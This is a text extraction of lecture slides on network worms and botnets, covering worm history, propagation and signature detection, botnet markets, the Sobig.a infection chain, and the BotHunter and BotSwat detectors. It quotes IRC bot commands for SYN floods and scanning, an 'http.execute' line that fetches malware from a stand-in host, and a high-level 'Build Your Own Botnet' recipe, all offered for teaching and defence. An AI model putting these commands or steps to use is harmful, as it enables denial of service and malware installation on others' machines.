Network Worms and Bots
2
OutlineWorms
Worm examples and propagation methods Detection methods
Traffic patterns: EarlyBird Vulnerabilities: Generic Exploit Blocking
Disabling worms Generate signatures for network or host-based filters
Bots Structure and use of bots Recognizing bot propagation Recognizing bot operation
Network-based methods Host-based methods
3
WormA worm is self-replicating software designed to spread through the network
Typically, exploit security flaws in widely used services
Can cause enormous damage Launch DDOS attacks, install bot networks Access sensitive information Cause confusion by corrupting the sensitive information
Worm vs Virus vs Trojan horse A virus is code embedded in a file or program Viruses and Trojan horses rely on human intervention Worms are self-contained and may spread
autonomously
4
Cost of worm attacksMorris worm, 1988 Infected approximately 6,000 machines
10% of computers connected to the Internet cost ~ $10 million in downtime and cleanup
Code Red worm, July 16 2001 Direct descendant of Morris’ worm Infected more than 500,000 servers
Programmed to go into infinite sleep mode July 28 Caused ~ $2.6 Billion in damages,
Love Bug worm: $8.75 billionStatistics: Computer Economics Inc., Carlsbad,
California
5
Internet Worm (First major attack)
Released November 1988 Program spread through Digital, Sun
workstations Exploited Unix security vulnerabilities
VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code
Consequences No immediate damage from program itself Replication and threat of damage
Load on network, systems used in attack Many systems shut down to prevent further
attack
6
Some historical worms of noteWorm Dat
eDistinction
Morris 11/88
Used multiple vulnerabilities, propagate to “nearby” sys
ADM 5/98 Random scanning of IP address spaceRamen 1/01 Exploited three vulnerabilitiesLion 3/01 Stealthy, rootkit wormCheese 6/01 Vigilante worm that secured vulnerable systemsCode Red 7/01 First sig Windows worm; Completely memory
residentWalk 8/01 Recompiled source code locallyNimda 9/01 Windows worm: client-to-server, c-to-c, s-to-s, …Scalper 6/02 11 days after announcement of vulnerability;
peer-to-peer network of compromised systemsSlammer 1/03 Used a single UDP packet for explosive growthKienzle and Elder
7
Increasing propagation speedCode Red, July 2001
Affects Microsoft Index Server 2.0, Windows 2000 Indexing service on Windows NT 4.0. Windows 2000 that run IIS 4.0 and 5.0 Web servers
Exploits known buffer overflow in Idq.dll Vulnerable population (360,000 servers) infected in
14 hoursSQL Slammer, January 2003
Affects in Microsoft SQL 2000 Exploits known buffer overflow vulnerability
Server Resolution service vulnerability reported June 2002
Patched released in July 2002 Bulletin MS02-39 Vulnerable population infected in less than 10
minutes
8
Code RedInitial version released July 13, 2001 Sends its code as an HTTP request HTTP request exploits buffer overflow Malicious code is not stored in a file
Placed in memory and then run
When executed, Worm checks for the file C:\Notworm
If file exists, the worm thread goes into infinite sleep state
Creates new threads If the date is before the 20th of the month, the next 99
threads attempt to exploit more computers by targeting random IP addresses
9
Code Red of July 13 and July 19Initial release of July 13
1st through 20th month: Spread via random scan of 32-bit IP addr space
20th through end of each month: attack. Flooding attack against 198.137.240.91
(www.whitehouse.gov) Failure to seed random number generator linear growth
Revision released July 19, 2001. White House responds to threat of flooding attack by
changing the address of www.whitehouse.gov Causes Code Red to die for date ≥ 20th of the month. But: this time random number generator correctly seeded
Slides: Vern Paxson
10
Code Red 2
Released August 4, 2001.Comment in code: “Code Red 2.”
But in fact completely different code base.Payload: a root backdoor, resilient to reboots.Bug: crashes NT, only works on Windows 2000.Localized scanning: prefers nearby addresses.
Kills Code Red 1.Safety valve: programmed to die Oct 1, 2001.
Slides: Vern Paxson
11
Striving for Greater Virulence: Nimda
Released September 18, 2001.Multi-mode spreading: attack IIS servers via infected clients email itself to address book as a virus copy itself across open network shares modifying Web pages on infected servers w/
client exploit scanning for Code Red II backdoors (!)
worms form an ecosystem!Leaped across firewalls.
Slides: Vern Paxson
12
Code Red 2 kills off Code Red 1
Code Red 2 settles into weekly pattern
Nimda enters the ecosystem
Code Red 2 dies off as programmed
CR 1 returns thanksto bad clocks
Slides: Vern Paxson
13
How do worms propagate?Scanning worms
Worm chooses “random” addressCoordinated scanning
Different worm instances scan different addressesFlash worms
Assemble tree of vulnerable hosts in advance, propagate along tree
Not observed in the wild, yet Potential for 106 hosts in < 2 sec ! [Staniford]
Meta-server worm Ask server for hosts to infect (e.g., Google for “powered by
phpbb”)Topological worm:
Use information from infected hosts (web server logs, email address books, config files, SSH “known hosts”)
Contagion worm Propagate parasitically along with normally initiated
communication
14
Worm Detection and DefenseDetect via honeyfarms: collections of “honeypots”
Any outbound connection from honeyfarm = worm.(at least, that’s the theory)
Distill signature from inbound/outbound traffic. If honeypot covers N addresses, expect detection when
worm has infected 1/N of population.
Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts
5 minutes to several weeks to write a signature Several hours or more for testing
15
Signature inferenceMonitor network and look for strings common to traffic with worm-like behavior Signatures can then be used for content
filtering
Slide: S Savage
16
Content siftingAssume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...)Two consequences
Content Prevalence: W will be more common in traffic than other bitstrings of the same length
Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
Content sifting: find W’s with high content prevalence and high address dispersion and drop that traffic
Slide: S Savage
17
Address Dispersion Table Sources Destinations Prevalence Table
The basic algorithmDetector in
networkA B
cnn.comC
DE
(Stefan Savage, UCSD *)
18
1 (B)1 (A)
Address Dispersion Table Sources Destinations
1 Prevalence Table
The basic algorithmDetector in
networkA B
cnn.comC
DE
(Stefan Savage, UCSD *)
191 (A)1 (C)1 (B)1 (A)
Address Dispersion Table Sources Destinations
11
Prevalence Table
The basic algorithmDetector in
networkA B
cnn.comC
DE
(Stefan Savage, UCSD *)
201 (A)1 (C)
2 (B,D)2 (A,B)
Address Dispersion Table Sources Destinations
12
Prevalence Table
The basic algorithmDetector in
networkA B
cnn.comC
DE
(Stefan Savage, UCSD *)
211 (A)1 (C)
3 (B,D,E)3 (A,B,D)
Address Dispersion Table Sources Destinations
13
Prevalence Table
The basic algorithmDetector in
networkA B
cnn.comC
DE
(Stefan Savage, UCSD *)
22
ChallengesComputation
To support a 1Gbps line rate we have 12us to process each packet, at 10Gbps 1.2us, at 40Gbps…
Dominated by memory references; state expensive Content sifting requires looking at every byte in a
packetState
On a fully-loaded 1Gbps link a naïve implementation can easily consume 100MB/sec for table
Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM
(Stefan Savage, UCSD *)
23
Worm summaryWorm attacks Many ways for worms to propagate Propagation time is increasing Polymorphic worms, other barriers to
detectionDetect Traffic patterns: EarlyBird Watch attack: TaintCheck and Sting Look at vulnerabilities: Generic Exploit
BlockingDisable Generate worm signatures and use in
network or host-based filters
24
Botnet Collection of compromised hosts Spread like worms and viruses Once installed, respond to remote
commands Platform for many attacks Spam forwarding (70% of all spam?) Click fraud Keystroke logging Distributed denial of service attacks
Serious problem Top concern of banks, online merchants Vint Cerf: ¼ of hosts connected to Internet
25
What are botnets used for?capability ago DSNX evil G-SyS sd Spycreate port redirect √ √ √ √ √other proxy √download file from web √ √ √ √ √DNS resolution √ √ √UDP/ping floods √ √ √ √other DDoS floods √ √ √scan/spread √ √ √ √ √spam √visit URL √ √ √
Capabilities are exercised via remote commands.
26
Building a Bot Network
Attacker
Win XP
FreeBSD
Mac OS X
compromise attempt
compromise attempt
compromise attempt
compromise attempt Win XP
27
Building a Bot Network
Attacker
Win XPcompromised
FreeBSD
Mac OS X
compromise attempt
compromise attempt
compromise attempt
compromise attempt Win XPcompromised
install bot software
install bot software
28
Step 2
. . ./connect jade.va.us.dal.net/join #hacker. . .
Win XP. . ./connect jade.va.us.dal.net/join #hacker. . .
Win XP. . ./connect jade.va.us.dal.net/join #hacker. . .
Win XP
jade.va.dal.net
29
Step 3(12:59:27pm) -- A9-pcgbdv ([email protected]) has joined (#owned) Users : 1646
(12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
(12:59:27pm) -- A6-bpxufrd ([email protected]) has joined (#owned) Users : 1647
(12:59:27pm) -- A9-nzmpah ([email protected]) has left IRC (Connection reset by peer)
(12:59:28pm) (@PhaTTy) .scan.enable DCOM
(12:59:28pm) -- A9-tzrkeasv ([email protected]) has joined (#owned) Users : 1650
3030
•Spam service•Rent-a-bot•Cash-out•Pump and dump•Botnet rental
31
Underground commerce Market in access to bots
Botherd: Collects and manages bots Access to proxies (“peas”) sold to spammers, often with
commercial-looking web interface Sample rates
Non-exclusive access to botnet: 10¢ per machine Exclusive access: 25¢. Payment via compromised account (eg PayPal) or cash to
dropboxIdentity Theft
Keystroke logging Complete identities available for $25 - $200+
Rates depend on financial situation of compromised person Include all info from PC files, plus all websites of interest
with passwords/account info used by PC owner At $200+, usually includes full credit report [Lloyd Taylor, Keynote Systems, SFBay InfraGard
Board ]
32
Sobig.a In ActionArrives as an email attachment Written in C++ Encrypted with Telock to slow analysis
User opens attachment, launching trojan Downloads file from a free Geocities
account Contains list of URLs pointing to second
stageFetches second-stage trojan Arbitrary executable file – could be anything For Sobig.a, second-stage trojan is Lala
33
Stage 2 – LalaCommunication Lala notifies a cgi script on a compromised
host Different versions of Lala have different
sites and cgi scripts, perhaps indicating tracking by author
Installation Lala installs a keylogger and password-
protected Lithium remote access trojan. Lala downloads Stage 3 trojan
Wingate proxy (commercial software)Cleanup Lala removes the Sobig.a trojan
34
Stage 3 – WingateWingate is a general-purpose port proxy server
555/TCP – RTSP 608/TCP – Remote Control Service
1180/TCP – SOCKS 1181/TCP – Telnet Proxy 1182/TCP – WWW Proxy 1183/TCP – FTP Proxy 1184/TCP – POP3 Proxy 1185/TCP – SMTP Server
Final state of compromised machine Complete remote control by Lithium client with
password “adm123” Complete logging of user’s keystrokes Usable for spam relay, http redirects Wingate Gatekeeper client can connect to 608/TCP,can log/change everything
35
Build Your Own BotnetPick a vector mechanism
IRC Channels: DCC Filesends, Website Adverts to Exploit Sites
Scan & Sploit: MSBlast Trojan: SoBig/BugBear/ActiveX Exploits
Choose a Payload Backdoors
Agobot, SubSeven, DeepThroat Most include mechanisms for DDoS, Self-spreading,
download/exec arbitrary code, password stealers.Do it
Compromise an IRC server, or use your own zombied machines
Configure Payload to connect to selected server Load encryption keys and codes Release through appropriate compromised systems Sit back and wait, or start on your next Botnet
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]
36
Bot detection methodsSignature-based (most AV products)Rule-based
Monitor outbound network connections (e.g. ZoneAlarm, BINDER)
Block certain ports (25, 6667, ...)Hybrid: content-based filtering
Match network packet contents to known command strings (keywords)
E.g. Gaobot ddos cmds: .ddos.httpfloodNetwork traffic monitoring
Wenke Lee, Phil Porras: Bot Hunter, … Correlate various NIDS alarms to identify “bot infection sequence”
GA Tech: Recognize traffic patterns associated with ddns-based rallying
Stuart Staniford, FireEye Detect port scanning to identify suspicious traffic Emulate host with taint tracking to identify exploit
37
What is botHunter?
What is botHunter?A Real Case StudyBehavior-based CorrelationArchitectural Overview
IntroductionApproaches to Privacy-Preserving Correlation
A Cyber-TA Distributed Correlation Example – botHunter
botHunter SensorsCorrelation FrameworkExample botHunter OutputCyber-TA Integration
BotHunter: passive bot detection
Snort-based sensor suite for malware event detection
inbound scan detection remote to local exploit detection anomaly detection system for exploits over key TCP
protocols Botnet specific egg download banners, Victim-to-C&C-based communications exchanges
particularly for IRC bot protocolsEvent correlator
combines information from sensors to recognize bots that infect and coordinate with your internal network assets
Submits “bot-detection profiles” to the Cyber-TA repository infrastructure
38
Botnets network traffic patterns
Unique characteristic: “rallying” Bots spread like worms and trojans Payloads may be common backdoors Centralized control of botnet is characteristic feature
Georgia Tech idea: DNS Bots installed at network edge IP addresses may vary, use Dynamic DNS Bots talk to controller, make DDNS lookup
Pattern of DDNS lookup is easy to spot for common botnets!
David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard,
Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)
39
BotSwatHost-based bot detectionBased on idea of remote control commands
40
What does remote control look like?
Invoke system calls: connect, network send and recv, create file, write
file, …On arguments received over the network:
IP to connect to, object to request, file name, …Botswat premise
We can distinguish the behavior of bots from that of innocuous processes via detecting “remote control”
We can approximate “remote control” as “using data received over the network in a system call argument”
http.execute <URL> <local_path>
41
Windows XP
agobot
NIC
http.execute www.badguy.com/malware.exe C:\WIN\bad.exe
connect(…,www.badguy.com,…)
send( …,“…GET /malware.exe…”,…)
fcreate(…,“C:\WIN\malware.exe”,…)
1
2
43
6
7
5
8